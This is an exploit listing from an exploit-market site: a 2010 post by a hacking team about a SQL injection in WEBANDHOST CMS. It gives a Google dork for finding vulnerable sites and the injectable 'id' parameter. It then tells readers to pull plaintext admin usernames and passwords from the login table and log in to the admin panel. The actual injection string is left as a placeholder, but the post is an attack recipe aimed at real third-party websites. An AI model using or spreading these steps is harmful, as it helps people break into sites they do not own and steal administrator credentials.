[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WEBANDHOST CMS SQL Injection Vulnerability

Author
H-SK33PY
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13547
Category
web applications
Date add
01-08-2010
Platform
php
==========================================
WEBANDHOST CMS SQL Injection Vulnerability
==========================================

# Exploit Title: WEBANDHOST CMS SQL Injection Vulnerability                                       
# Author: H-SK33PY                      
# Software Link: http://www.webandhost.de/
# Version: N/A
# Google dork : inurl:"default.php?id=" & intext:"powered by WEBANDHOST"
# Platform / Tested on: linux
# Category: webapplications
# Code : [SQLi] 


   0101010101010101010101010101010101010101010101010101010101
   0                                                                                                 0
   1  Iranian Datacoders Security Team 2010									 1
   0                                                                                                0
   010101010101010101010101010101010101010101010101010101010

#BUG:#########################################################################

After find bug on the sites , run this :

http://site.com/default.php?id=1[SQLi]

so after find table username & password is not hash code in login table

get the admin panel :

http://site.com/admin/

and login this .

Good Luck

#############################################################################
Our Website : http://www.datacoders.ir

Special Thanks to : all iranian datacoders members

#############################################################################



#  0day.today [2024-11-15]  #